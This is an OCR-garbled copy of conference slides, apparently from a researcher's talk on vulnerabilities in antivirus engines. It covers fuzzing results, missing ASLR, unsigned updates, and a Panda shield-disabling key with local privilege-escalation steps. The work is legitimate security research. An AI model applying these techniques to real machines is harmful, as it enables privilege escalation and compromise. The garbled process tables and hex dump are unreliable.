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Antivirus Engines 



. Common features of AV engines: 

. Written in C/C++. 

- Signatures based engine + lieuristics. 

- On-access scanners. 

- Command line/GUI on-demand scanners. 

- Support for compressed file arcliives. 

- Support for packers. 

- Support for miscellaneous file formats. 
. Advanced common features: 

- Packet filters and firewalls. 

- Drivers to protect the product, anti-rootkits, etc... 

- Anti-exploiting toolkits. 



Antivirus products or engines 



. An antivirus engine is just the core, the kernel, of an 
antivirus product. 

- Some antivirus engines are used by multiple products. 

■ For example, BitDefender is the most widely used 
antivirus kernel. 

■ It's used by so many products like G-Data, eScan, F- 
Secure, etc... 

■ Most "big" antivirus companies have their own engine 
but not all. And some companies, like F-Secure, 
integrate 3rd party engines in their products. 

■ In general, during this talk I will refer to AV engines, to the 
kernels, except when specified the word "product". 



Attack surface 



- Fact: installing an application in your computer makes 
you a bit more vulnerable. 

■ You just increased your attack surface. 

- If the application is local: your local attack surface 
increased. 

- If the application is remote: your remote attack surface 
increased. 

- If your application runs with the highest privileges, 
installs kernel drivers, a packet filter and tries to 
handle anything your computer may do... 

- Your attack surface dramatically increased. 



Myths and reality 



■ Antivirus propaganda: 

- "We make your computer safer with no performance 
penalty!" 

m "We protect against unknown zero day attacks!". 

■ Reality: 

- AV engines makes your computer more vulnerable 
with a varying degree of performance penalty. 

- The AV engine is as vulnerable to zero day attacks 
as the applications it tries to protect from. 

■ And can even lower the operating system 
exploiting mitigations, by the way... 
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Attacking antivirus engines 



■ AV engines, commonly, are written in non managed 
languages due to performance reasons. 

. Almost all engines written in C and/or C++ with only a few 
exceptions, like the old MalwareBytes, written in VB6 (!?). 

- It translates into buffer overflows, integer overflows, format 
strings, etc... 

■ Most AV engines installs operating system drivers. 

■ It translates into possible local escalation of privileges. 

■ AV engines must support a long list of file formats: 

. Rar, Zip, 7z, Xar, Tar, Cpio, Ole2, Pdf, Chm, Hip, PE, Elf, 
Mach-0, Jpg, Png, Bz, Gz, Lzma, Tga, Wmf, Ico, Cur... 

- It translates into bugs in the parsers of such file formats. 



Attacking antivirus engines 



. AV engines not only need to support such large list of 
file formats but they also need to do this quickly and 
better than the vendor 

■ If an exploit for a new file format appears, customer will 
ask for support for such files as soon as possible. The 
longer it takes, the higher the odds of losing a customer 
moving on to another vendor. 

■ The producer doesn't need to "support" malformed files. 
The AV engine actually needs to do so. 

- The vendor needs to handle malformed files but only to refuse 
them as repairing such files is an open door for vulnerabilities. 

- Example: Adobe Acrobat 



Attacking antivirus engines 



■ Most (if not all...) antivirus engines run with the highest 
privileges: root or local system. 

. If one can find a bug and write an exploit for the AV engine, 
(s)he just won root or system privileges. 

■ Most antivirus engines updates via HTTP only protocols: 

. If one can MITM the connection (for example, in a LAN) one 
can install new files and/or replace existing installation files. 

- It often translates in completely owning the machine with the 
AV engine installed as updates are not commonly signed. 
Yes. They aren't. 

. I will show later one of the many vulnerable products... 
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Vulnerabilities in AV engines 



started around end of July/beginning of August to find 
vulnerabilities, for fun, in some AV engines. 

■ In my spare time, some hours from time to time. 

Found remote and local vulnerabilities in 14 AV 
engines or AV products. 

■ Most of them in the first 2 months. 

■ I tested -17 engines (I think, I honestly do not 
remember). 

■ It says it all. 

I'll talk about some of the vulnerabilities I discovered. 
The following are just a few of them... 



AV engines vulnerabilities 



■ Avast: Heap overflow in RPM (reported, fixed and paid Bug Bounty) 

■ Avg: Heap overflow with Cpio (fixed. ..)/Multiple vulnerabilities with packers 

■ Avira: Multiple remote vulnerabilities 

■ BitDefender: Multiple remote vulnerabilities 

■ ClamAV: Infinite loop with a malformed PE (reported & fixed) 

■ Comodo: Heap overflow with Chm 

■ DrWeb: Multiple remote vulnerabilities (vulnerability with updating engine fixed) 

■ ESET: Integer overflow with PDF (fixed)/Multiple vulnerabilities with packers 

■ F-Prot: Heap overflows with multiple packers 

■ F-Secure: Multiple vulnerabilities in Aqua engine (all the F-Secure own bugs fixed) 

■ Panda: Multiple local privilege escalations (reported and partially fixed) 

■ eScan: Multiple remote command injection (all fixed? LOL, I doubt...) 

■ And many more... 



How to find such vulnerabilities? 



. In my case I used, initially, Nightmare, a fuzzing testing suite of 
my own. 

. Downloaded all the AV engines with a Linux version I was able 
to find. 

- The core is always the same with the only exception of some 
heuristic engines. 

- Also used some tricks to run Windows only AV engines in Linux. 

- Fuzzed the command line tool of each AV engine by simply 
using radamsa + the testing suite of ClamAV, many different 
EXE packers and some random file formats. 

- Results: Dozens of remotely exploitable vulnerabilities. 

- Also, I performed basic local and remote checks: 

. ASLR, null ACLs, updating protocol, network services, etc... 



Fuzzing statistics 



- A friend of mine convinced me to write a fuzzer and do 
a "Fuzzing explained" lil<e tall< for a private conference. 

■ Really simple fuzzing engine with a max. of 10 nodes. 

■ I'm poor... I cannot "start relatively small, with 
300 boxes" like Google people does. 

- Used this fuzzing suite to fuzz various Linux based AV 
engines, those I was able to run and debug. 

- For that specific talk I did fuzz/test the following ones: 

■ BitDefender, Comedo, F-Prot, F-Secure, Avast, 
ClamAV, AVG. 

- Results... 



Initial experiment results 



- ClamAV: 1 Remote DOS with a malformed icon 
resource directory in a PE. 

- Avast: One possible ROE due to an uninitialized 
variable in code handling RPM archives. 

- F-Secure: One memory exhaustion bug with CPIO. 

- Comodo: 2 heap overflows, one handling OHM files. 

■ F-Prot: Armadillo, PECompact, ASPack and Yoda's Protector 
unpackers heap overflows. 

. AVG: CPIO and XAR heap overflows. 

■ BitDefender: Amazing number of bugs. Many likely 
exploitables. 
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Exploiting AV engines 



What will be briefly covered: 

- Remote exploitation. 

What will be not: 

- Local exploitation of local user-land or kernel-land 
vulnerabilities. 

- I have no knowledge about kernel-land, sorry. 

- Later on, I will discuss some local vulnerability and 
give details about how to exploit it but it isn't kernel 
stuff and is too easy to exploit. 



Exploiting AV engines 



■ Exploiting an AV engine is lil<e exploiting any 
other client-side application. 

- Is not like exploiting a browser or a PDF reader. 

- Is more like exploiting an Office file format. 

■ Exploiting memory corruptions in client-side 
applications remotely can be quite hard 
nowadays due to ASLR. 

- However, AV engines makes too many mistakes 
too often so, don't worry ;) 



Exploiting AV engines 



■ In general, AV engines are all compiled with 
ASLR enabled. 

■ But it's common that only the core modules are 
compiled with ASLR. 

- Not the GUI related programs and libraries, for 
example. 

■ Some libraries of the core of some AV engines 
are not ASLR enabled. 

- Check your target/own product, there isn't only 
one ;) 



Exploiting AV engines 



Even in "major" AV engines... 

- ...there are non ASLR enabled modules. 

- ...there are RWX pages at fixed addresses. 

- ...they disable DEP. 

Under certain conditions, of course. 
The condition, often, is the emulator. 



Exploiting AV engines 



■ The x86 emulator is a key part of an AV engine. 

■ It's used to unpack samples in memory, to 
determine the behaviour of an executable 
program, etc... 

■ Various AV engines create RWX pages at fixed 
addresses and disable DEP as long as the 
emulator is used. 

- Very common. Does not apply to only some random 
AV engine. 



Exploiting AV engines (more tips) 



■ By default, an AV engine will try to unpack 
compressed files and scan the files inside. 

■ A compressed archive file (zip, tgz, rar, ace, 
etc..) can be created with several files inside. 

■ The following is a common AV engines 
exploitation scenario: 

- Send a compressed zip file. 

- The very first file inside forces the emulator to be 
loaded and used. 

- The 2nd one is the real exploit. 



Exploiting AV engines 



■ AV engines implement multiple emulators. 

■ There are emulators for x86, AMD64, ARM, JavaScript, 
VBScript, .... in most of the "major" AV engines. 

■ The emulators, as far as I can tell, cannot be used to 
perform heap spraying, for example. But they expose a 
considerable attack surface. 

- It's common to find memory leaks inside the emulators, 
specially in the JavaScript engine. 

- They can be used to construct complex exploits as we have 
a programming interface to craft inputs to the AV engine. 



Exploiting AV engines: Summary 



■ Exploiting AV engines is not different to exploiting other 
client-side applications. 

■ They don't have/offer any special self-protection. They rely 
on the operating system features (ASLR/DEP) and nothing 
else. 

. And sometimes they even disable such features. 

■ There are programming interfaces for exploit writers: 

. The emulators: x86, AMD-64, ARM, JavaScript, ... usually. 

■ Multiple files doing different actions each can be send in 
one compressed file as long as the order inside it is kept. 

■ Owning the AV engine means getting root or system in all 
AV engines I tested. There is no need for a sandbox 
escape, in general. 
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Details about some vulnerabilities in 
AV engines and products... 




Extracted from http://theoatnneal.conn/connics/qrunn 



Copyright © Matthew Innnan 



Disclaimer 



■ rm only showing a few of my vulnerabilities. 

. I have the bad habit of eating 3 times a day... 

■ I contacted 5 vendors for different reasons: 

- Avast. They offer a Bug Bounty. Well done guys! 
. ClamAV. Their antivirus is Open Source. 

. Panda. I have close friends there. 

. Ikarus, ESET and F-Secure. They contacted me an asked 
for help nicely. 

■ I do not "responsibly" contact irresponsible multi-million 
dollar companies. 

- I don't give my research for free. 

- Audit your products... 



Local Escalation of Privileges 



Example: Panda Multiple local EoPs 



■ In the product Global Protection 2013 there 
were various processes running as SYSTEM. 

■ Two of those processes had a NULL process 
ACL: 

. WebProxy.EXE and SrvLoad.EXE 

■ We can use CreateRemoteThread to inject a 
DLL, for example. 

■ Two very easy local escalation of privileges. 

■ But the processes were "protected" by the 
shield. 



Example: Panda Multiple local EoPs 



■ Another terrible bug: The Panda's installation 
directory had write privileges for all users. 

■ However, again, the directory was "protected" 
by the shield... 

■ What is the fucking shield? 



Example: Panda Multiple local EoPs 



■ The Panda shield is a driver that protects some 
Panda owned processes, the program files 
directory, etc... 

■ It reads some registry keys to determine if the 
shield is enabled or disabled. 

- But... the registry key is world writeable. 

■ Also, it's funny, but there is a library 
(pavshld.dll) with various exported functions... 



Example: Panda Multiple local EoPs 



■ All exported functions contains human readable names. 

. All but the 2 first functions. They are called PAVSHLD_001 
and 002. 

■ Decided to reverse engineer them for obvious reasons... 

■ The 1st function is a backdoor to disable the shield. 

■ It receives only 1 argument, a "secret key" (GUID): 

. ae21 7538-1 94a-41 78-9a8f-2606b94d9f 1 3 

■ If the key is correct, then the corresponding registry keys 
are written. 

■ Well, is easier than writing yourself the registry entries... 



MOAR PANDAZ 



■ There are more stupid bugs in this AV engine... 

■ For example, no library is compiled with ASLR 
enabled. 

■ One can write a reliable exploit for Panda 
without any real big effort. 

■ And, also, one can write an exploit targeting 
Panda Global Protection users for any program. 

■ Why? Because the product injects 3 libraries 
without ASLR enabled in all processes. Yes. 



Panda 



■ I reported the vulnerabilities because I have 
friends there. 

■ Some of them are (supposedly) fixed, others 
not... 

- The shield backdoor. 

- The permissions of the Panda installation directory. 



ASLR related 
(Address Space Layout Randomization) 



ASLR disabled 



■ We already discussed that Panda Global 
Protection doesn't enable ASLR for all modules. 

■ Do you believe this is an isolated problem of 
just one antivirus product? 

■ As it is common with antivirus products/ 
engines, such problems are not specific... 



One example... 



Forticlient 



The process av_task.exe is the actual AV 
scanner... 



1^ FortiTrav.exe 


0.9G 


4.91 GK 


12.108 K 


25G4 FortiClient Gystem Trav Contr... 


Fortinet Inc. 


update_task.exe 


0.44 


4.312 K 


9.512 K 


1 380 update_task 


Fortinet Inc. 


□ IT] av_task.exe 


0.35 


9.104 K 


12.020 K 


3052 av_task 


Fortinet Inc. 


av_task.exe 


1.82 


9.852 K 


13.904 K 


2304 av_task 


Fortinet Inc. 




111 spools v.ene 




4.388 K 


6.148 K 


1928 9 pooler GubGystem App 


Microsoft Corporation 




svchost.exe 




10.216 K 


7.704 K 


1972 Host Process for Windows G... 


Microsoft Corporation 




svchost.exe 




3.344 K 


5.504 K 


306 Host Process for Windows G... 


Microsoft Corporation 




111 SearchI ndexer.exe 


0.31 


15.192 K 


8.688 K 


33G4 Microsoft Windows Gearch 1... 


Microsoft Corporation 




|i]3 taskhost.exe 


0.05 


8.380 K 


9.744 K 


14G4 Host Process for Windows T... 


Microsoft Corporation 




|i]3 taskhost.exe 


0.20 


3.388 K 


8.628 K 


3784 Host Process for Windows T... 


Microsoft Corporation 


111 lsass.exe 




2.560 K 


6.220 K 


516 Local Gecurity Authority Proc... 


Microsoft Corporation 


lillsm.ene 




1.708 K 


3.948 K 


524 Local Gession Manager Gerv... 


Microsoft Corporation 


lilcsrss.ene 


0.24 


1.208 K 


4.224 K 


412 Client Gerver Runtime Process 


Microsoft Corporation 


III winlogon.exe 




1.728 K 


4.752 K 


440 Windows Logon Application 


Microsoft Corporation 


□ explorer.exe 


1.43 


36.908 K 


55.152 K 


1 392 Windows Explorer 


Microsoft Corporation 





Name 


Description 


Company Name 


Path 


AGLR - 


Version 


locale, nis 






C:\Windows\Gystem32\locale.nls 


n/a 




mdare_sig 






C:\Program Files\Fortinet\FortiClient\vir_sig\mdare_sig 


n/a 
















Iibeav32.dll 


□ penGGL Ghared Library 


The 0 penGGL Project, htt... 


C:\Program Files\Fortinet\FortiClient\libeay 32.dll 




1.0.1.5 1 


av_task.exe 


av_task 


Fortinet Inc. 


C:\Program Files\Fortinet\FortiClient\av_task. cue 




5.0.7.333 1 


utilsdll.dll 


utilitv library 


Fortinet Inc. 


C:\Program Files\Fortinet\FortiClient\utilsdll.dll 




5.0.7.333 1 


libavr.dll 


AV repair library 


Fortinet Inc. 


C:\ProgramFiles\Fortinet\FortiClient\libavr.dll 




5.0.7.333 1 


mdare.dll 


Malware Detection and Removal E.. 


Fortinet Inc. 


C:\ProgramFiles\Fortinet\FortiClient\mdare.dll 




2.0.43.0 1 


libav.dll 


AV Engine Library 


Fortinet Inc. 


C:\ProgramFiles\Fortinet\FortiClient\libav.dll 




5.1.146.0 1 















Forticlient 



■ Most libraries and binaries in Forticlient doesn't 
have ASLR enabled. 

- Exploiting Forticlient with so many non ASLR 
enabled modules once a bug is found is trivial. 

■ You may think that this is a problem that doesn't 
happen to the "big" ones... 

- Think again. 



2 random AVs nobody uses... 



^ ^^^^^^^^^^^^^ 

ANTI* VIRUS 


( 


rrjn 


1 


bitd€fEnd€r 

stcurm uotit^€¥*ru bit 



Kaspersky - 



Before SyScan 2014 Singapore, the libraries 
avzkrnl.dll and module vins.kdl, a vulnerability 
scanner (LOL), were not ASLR enabled. 

One can write a reliable exploit for Kaspersky 
AV without any real effort. 



fr^ avp.ewe 

ProtectedObjectsSrv.exe 
svchost.eKe 
svchost.exe 
svchost.eKe 
111 SearchlndeKer.eKe 
111 taskhost.exe 
lillsass.ewe 
lil Ism.exe 
lilcsrss.ene 
j|) winlogon.exe 
□ j-j eKplorer.eKe 

ijSl VBoxTraii.exe 



1.74 



0.02 

0.05 
0.49 
0.31 
0.11 

0.28 
0.3G 



2G0.412K 
1.000 K 
3.348 K 
1.232 K 
32.208 K 
16.644 K 
6.188 K 
2.560 K 
1.686 K 
1.268 K 
1.852 K 
29.132 K 
16.724 K 



20.1 96 K 
3.000 K 
4.572 K 
3.588 K 
8.1 40 K 
8.01 2 K 
8.656 K 
5.880 K 
3.868 K 
4.776 K 
4.692 K 

44.91 6 K 
4.852 K 



1 648 Kaspersky Anti-Virus 

1B88 InfoWatch CrvptoStorage Pr... 

1 736 Host Process for Windows 6... 

456 Host Process for Windows S... 
2804 Host Process for Windows 8... 
2880 fvlicrosoft Windows Searcfn I... 
3620 Host Process for Windows T... 

636 Local Becurity Autfioritv Proc... 

644 Local Session Manager Serv... 

536 Client Server Runtime Process 

560 Windows Logon Application 
1 308 Windows Explorer 
2736 VirtualBox Guest Additions Tr... 



Kaspersky Lab ZAO 
Infowatch 

Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Oracle Corporation 



i 1 ■ II .-.J.-..-.I/ ^-.J^^.-.l.. .-.-li^di ..-rll^lll..-.lll .-.i.^ 


Name 


Description 


Company Name 


Path 


ASLR 


iswift.dat 






C:\ProgramData\KasperskyLab\PURE13\D ata\iswift.dat 

1. [~| _ FTi I K 1/ 1... 1 _L'. I~ll H~|l~i"~lll~V L ^' 'il _J___L 


n/a 




vlns.kdl.317df7c0eff093... 


Vulnerability scanner 


Kaspersky Lab ZAO 


C:\ProgramData\KasperskyLab\PURE13\Bases\Cache\vlns.kdl.317df7c0eff0939e6289f5c72f... 





c 



avzkrnl.f 



AVZ Kernel 



Kaspersky Lab 



C:\Program Files\Kaspersky LabVKaspersky PURE 3.0\avikrnl.( 



] 



Kaspersky 



- After SyScan 2014 Singapore, after making those 
ASLR bypasses publicly available to any body, they 
still didn't fix them. 

- I don't know what to say... But it seems they simply 
don't care, like most of the AV companies in the 
industry. 

■ Why bother fixing this issue if the scanner is running as 
system with the highest integrity level and without any 
kind of sandboxing? 



BitDefender 



It's kind of easier to write an exploit for BitDefender... 




Iijijpdatesrv.exe 


0.11 


G.084 K 


G.41GK 


G37G Bitdefender Update Gervice 


Bitdefender 




^^^^■3D|vsser V. e^e 


0.40 


15G.G24K 


G.972 K 


G444 Bitdefender Gecuritv Gervice - 




-J "Securi fy service " my ass. . . 


[■lIsass.eHe 


0.10 


2.752 K 


5.836 K 


51 2 Local Securitv Authoritv Proc. 


Microsoft Corporation 




n 1.^ 


1 ■70^ f 






KHi.-.r.-.o.-.fh Pr-Tr-T-T shi.-.>-. 





Name 



Description 



Company Name 



Path 



AS LP 



Version 



smartdbv2.dat 






CAProgram Files\Common Files\Bitdefender\Bitdefender Threat Scanner^ntivirus_ 


.20090. 


.002V.. 


n/a 




vsserv.exe 


Bitdefender Gecurity Gervice 


Bitdefender 


C:\Program Files\Bitdefender\Bitdefender\vsserv.eKe 








17.25.0.1071 


npcomm.dll 


Named Pipes Communication Gyst... 


BitDefender LLC 


CAProgram Files\Bitdefender\Bitdefender\npcomm.dll 








8.0.0.2 


vsserv.ui 


Bitdefender Gecuritv Gervice 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\ui\vsserv.ui 








17.G.0.22 


iservconfig.dll 


Product Info Librarv 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\iservconfig.dll 








17.25.0.1074 


bdch.dll 


BitDefender Crash Handler 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\bdch.dll 








3.0.2.714 


logger, ui 


Bitdefender Logger 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\uiMogger.ui 








17.10.0.278 


framework.dll 


framework 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\framework.dll 








17.18.0.778 


gzfltdp.dll 


BitDefender GzFltDp 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\gzfltdp.dll 








3. 0.2. 893 


bdutils.dll 


BDUtils Dynamic Link Library 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\bdutils.dll 








17.13.0.527 


bdcore.dll 


BitDefender Core 


BitDefender 


CAProgram Files\Common Files\Bitdefender\Bitdefender Threat ScannerVinti virus. 


.20090. 


.002V.. 




11.0.1.6 


accessal.dll 


BitDefender OnAccessAL 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\accessal.dll 








3.0.2.762 


scansp.dll 


BitDefender GcanSP 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\scansp.dll 








3.0.2.744 


bdsubmit.dll 


Bitdefender Gubmission Library 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\bdsubmit.dll 








17.13.0.527 


quarcore.dll 


Quarantine Core 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\quarcore.dll 








17. 25. 0.1 061 


wsutils.dll 


WSUtils Dynamic Link Library 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\wsutils.dll 








3.0.0.22 


wspack.dll 


\ . t \- l~i 1 ■ 1 

Web Services Packing Library 


Bitdefender 


|— ■ 1 I— 1 1— -I 1 { _| 1 |-| 'i 1 L 1 1 1 III 

CAProgram Files\Bitdefender\Bitdefender\wspack.dll 








3.0.0.22 


wslib.dll 


Web Services Library 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\wslib.dll 








3.0.0.22 


otcore.dll 


Bitdefender Antispam Core 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\otengines_00027_002\otcore.dll 








2.13.5.18034 


txmlutil.dll 


tinyxmix Dynamic Link Library 




CAProgram Files\Bitdefender\Bitdefender\tKmlutil.dll 








12.1.0.0 


bdpop3p.dll 


P0P3 proxy 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\bdpop3p.dll 








17.23.0.989 


bdpredir.dll 


BitDefender Proxy Redirector User-... 


BitDefender 


CAProgram Files\Bitdefender\Bitdefender\bdpredir.dll 








7.0.0.5 


mimepack.dll 


fvllfvIE packer 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\mimepack.dll 








2.0.71.0 


wsc.dll 


Bitdefender WSC 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\wsc.dll 








17.25.0.1061 


wsc.ui 


Bitdefender WGC 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\ui\wsc.ui 








17.6,0.22 


bdsmtpp.dll 


GMTP proxy 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\bdsmtpp.dll 








17.23.0.989 


bdelev.dll 


Bitdefender Elevated Helper 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\bdelev.dll 








17.21.0.908 


bdusers.dll 


BDUSERS Dynamic Link Library 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\bdusers.dll 








17.18.0.778 


ipm.dll 


In Product fvlessages 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\ipm.dll 








17.24.0.1034 


ycfijptp.dll 


Yahoo fvlessenger Proxy 


Bitdefender 


CAProgram Files\Bitdefender\Bitdefender\y cry ptp.dll 








17.13.0.527 


ashttpbr.mdl 


HTTP Breaker Plugin 


Copyright ©1997-2011 Bit.. 


CAProgram Files\Bitdefender\Bitdefender\otengines_00027_002\ashttpbr.mdl 








2.13.5.18034 


ashttpdsp.mdl 


Bitdefender HTTP Dispatcher Plugin 


Copyright ©1997-2011 Bit.. 


CAProgram Files\Bitdefender\Bitdefender\otengines_00027_002\ashttpdsp.mdl 








2.13.5.18034 


ashttpph.mdl 


Bitdefender AntiPhishing Plugin 


Copyright ©1997-2011 Bit.. 


CAProgram Files\Bitdefender\Bitdefender\otengines_00027_002\ashttpph.mdl 








2.13.5.18034 


ashttprbl.mdl 


Bitdefender HTTP RBL Plugin 


Copyright ©1997-2011 Bit.. 


CAProgram Files\Bitdefender\Bitdefender\otengines_00027_002\ashttprbl.mdl 








2.13.5.18034 


asregex.dll 


BitDefender Antispam Regular Exp... 


BitDefender S.R.L. 


CAProgram Files\B itdefender\Bitdefender\otengines_00027_002\asregex.dll 








1.6.0.40714 


profapi.dll 


User Profile Basic API 


Microsoft Corporation 


CAWindowsVGvstem32\profapi.dll 






AGLR 


G.I. 7600. 16385 



■ BKAV is a Vietnamese antivirus product. 

■ Gartner recognizes it as a "Cool vendor in 
Emerging IVIarkets". 

■ I recognize it as a "Cool antivirus for writing 
targeted exploits"... 



They don't have ASLR enabled for their 



services 



|i^ BkavSystemService.ene 
BkavService.exe 
svchost.exe 
□ svchost.exe 
li^dwnn.ene 
svchost.exe 
svchost.exe 
spoolsv.exe 
svchost.exe 
B luProS ervice. exe 
svchost.exe 
svchost.exe 
taskhost.exe 
Searchlndexer.exe 
svchost.exe 
Trustedlnstaller.exe 
li^lsass.ene 
li^lsm.ene 
li^csrss.ene 
^ wirilogon.exe 
El ewplorer.ewe 



0.12 1 7.436 K 1 4.920 K 

0.47 5.508 K 7.696 K 

1 5.440 K 13.748K 

28.080 K 30.992 K 

4.644 K 8.448 K 

0.04 7.528 K 9.700 K 

0.04 1 1.720 K 1 2.620 K 

6.736 K 8.648 K 

1 1.456 K 10.752K 

3.716 K 6.480 K 

0.01 5.544 K 8.416K 

0.01 32.084 K 1 7.284 K 

0.06 7.832 K 1 1.672 K 

1 7.556 K 1 0.236 K 

0.11 20.920 K 32.684 K 

4.1 08 K 10.104 K 

4.912 K 8.936 K 

4.208 K 6.392 K 

0.10 1.284 K 5.588 K 

4.080 K 6.992 K 

0.28 27.940 K 41.728 K 



920 Bkav System Service 
1032 Bkav Service 
1080 Host Process for Windows S... 
1116 Host Process for Windows S... 
2820 Desktop Window Manager 
1156 Host Process for Windows S... 
1432 Host Process for Windows S... 
1584 Spooler Subsystem App 
1648 Host Process for Windows S... 
1892 Bkav live update service 
1 960 H ost Process for Windows S . . . 
1668 Host Process for Windows S... 
2536 Host Process for Windows T... 
3316 fvlicrosoft Windows Search I... 

448 Host Process for Windows S... 
1460 Windows Modules Installer 

604 Local Security Authority Proc... 

612 Local Session Manager Serv... 

496 Client Server Runtime Process 

524 Windows Logon Application 
2736 Windows Explorer 



Bkav Corporation 
Bkav Corporation 
Microsoft Corporal 
Microsoft Corporal 
Microsoft Corporal 
Microsoft Corporal 
Microsoft Corporal 
Microsoft Corporal 
Microsoft Corporal 
Bkav Corporation 
Microsoft Corporal 
Microsoft Corporal 
Microsoft Corporal 
Microsoft Corporal 
Microsoft Corporal 
Microsoft Corporal 
Microsoft Corporal 
Microsoft Corporal 
Microsoft Corporal 
Microsoft Corporal 
Microsoft Corporal 



ion 
ion 
ion 
ion 
ion 
ion 
ion 

ion 
ion 
ion 
ion 
ion 
ion 
ion 
ion 
ion 
ion 
ion 



Name 



Description 



Company Name 



Path 



ASLR * 



locale, nis 
SortDefault.nIs 



BkavScanDIIO.i 



Corelib.( 



Bkav scan module 



Core library 



\D eviceVB kavAutoS hadow2\Windows\System32Mocale. nIs 
\Device\BkavAutoShadow2\Windows\Globalization\Sorting\SortDefault.nls 



n/a 
n/a 



Bkav Corporation 



Bkav Corporation 



C:\Program Files\BkavPro\SystemVi,K\EkavScanDIIO.c 



C:\Program Files\BkavPro\SystemV^K\Corelib.c 



] 



And, like Panda, they inject a non ASLR 
enabled library system wide, the Bkav "firewall" 
engine... 



□ ^ explorer.exe 

^ VBowTraiJ.exe 
^ jusched.ewe 
□ ^ Bka.ewe 

Q BkavSiJstemServer.ewe 
^ BkavUtil.exe 
^ BLuPro.exe 
^ procexp.exe 



0.2S 
0.75 

0.G1 
0.14 

0.23 

10.50 



31.336 K 
3.480 K 
3.208 K 

32.520 K 

41.35GK 
2.080 K 
5.1 28 K 

21.008 K 



4G.400 K 
7.582 K 
G.S52 K 
38.040 K 
40.424 K 
5.384 K 
11.232 K 
30.824 K 

H {-, {-■{-,{-■ ly 



2738 Windows Explorer 

2S84 VirtualBox Guest Additions Tr. 

2904 Java(TM) Update Scheduler 

2924 Bkav Pro Internet SecuritiJ 

1 81 2 Bkav System Server 

3508 Bkav Util 

2984 BkavPro 

241 8 Sysinternals Process Explorer 



Microsoft Corporation 
Oracle Corporation 
Oracle Corporation 
Bkav Corporation 
Bkav Corporation 
Bkav Corporation 
Bkav Corporation 
Sysinternals - www.siisinter.. 



Name 



Description 



Company Nanrie 



Path 



ASLR 



ActionCenter.dll. mui 
KernelBase.dll.rmui 



\D eviceVB kavAutoS hadow2\Windows\Si)stem32\en-U S V^ctionCenter. dll. mui 
\D evice\B kavAutoS hadow2\Windows\SjJstem32\en-U S \KernelB ase. dll. mui 



n/a 
n/a 



■Hip 



C:\Program Files\BkavPro\SiJstenn\Firewall\BkavFirewallEngine.( 



BkavFirewallEngine.dll Bkav Firewall Engine 



Bkav Corporation 



_kJ: -tu 



Mttitm 



.---I.. .1:1-- JIL 



iAikscli.( 



Workstation Service Client DLL 



Microsoft Corporation 



C:\Windows\SiJstenn32\iwkscli. ( 



ASLR 



...miserably failing at securing your computer. 

BTW, this vulnerability was made PUBLIC 
months ago, in SyScan 2014 Singapore. 



AV developers writing security software 




Remote Denial of Service 



Examples: ClamAV DOS 



There is a bug in ClamAV scanning icon resource 
directories. 

■ If the number is too big, ClamAV would loop almost 
forever. 

■ Fixed by adding more limits to the engine. 
Found via dumb ass fuzzing. 

Reported. Because it's Open Source... 

The vulnerability was nicely handled by the ClamAV 
team (now Cisco). 



Decompression bombs (multiple AVs) 



Do you remember them? If I remember 
correctly, the 1st discussion in Bugtraq about it 
was in 2001. 

- A compressed file with many compressed files 
inside or with really big files inside. 

- It can be considered a remote denial of service. 

Do you think AV engines are not vulnerable any 
more to such bugs with more than +10 years? 

- In this case, you're wrong. 

- Look to the following table.... 



Failing AVs 




* Sophos finishes after -30 seconds. In a "testing" machine with 16 logical CPUs and 32 GB 
of RAM. 

** Kaspersky creates a temporary file. A 32GB dumb file is a ~3MB 7z compressed one. 
*** In my latest testing, ESET finishes after 1 minute with each file in my "small testing 
machine". 




secure ttour t^eru bit 



BitDefender engine 



■ BitDefender is a Romanian antivirus engine. 

■ Tlieir AV core is the most widely distributed AV 
engine in other AV products. 

- To name a few: F-Secure, G-Data, eScan, 
LavaSoft, Immunet, ... 

■ It suffers from a number of vulnerabilities like 
almost all other AV engines/products out there. 

■ Finding vulnerabilities in this engine is trivial. 

- Some easy examples... 



BitDefender bugs 



(Vulnerability fixed) Modifying 2 DWORDs in a PE file 
packed with ShrinkerS packer used to crash it: 
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00 


80 


00 


00 
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OB 00 


00 
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00 


00 
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00 


00 
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1C 


67 


51 


7E 
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49 
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55 46 
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?UIinzUFl 






00006E30 
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55 


49 


60 
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55 46 
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00 


00 
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O'B 


CI 


06 


00 


OB 


21 04 


C 
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? 1 


fill 


nn 


rq 


pp 
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,?,,,!,,,!,,??,, 
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CI 


06 


00 


OB 


21 04 




flR 
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nn 


rq 


pp 
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nn 
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C9 


AB 


04 


00 


C9 


7B 04 
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FF 


FF 


FF 


FF 


FF 


FF 
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?? , . ?{ . ,???????? 






00006E50 


C9 


AB 


04 


00 


C9 


7B 04 




C9 


7B 


44 


00 


C9 


6B 44 00 ■ 


00006E60 


C9 


7B 


44 


00 


CD 


7B 44 






LU 


JU 


44 


uu 


Ly 


JU 


44 


uu 


?{0,?{D.?{D.?{D, 






00006E60 


C9 


7B 


44 


00 


CD 


7B 44 




LU 


JU 


AA 


UU 


Ly 


i\i 


44 


uu 
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C9 


7B 
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00006E70 


C9 


7B 


44 


00 


C9 


CB 47 


00 
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DB 


47 
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C9 


DB 


47 
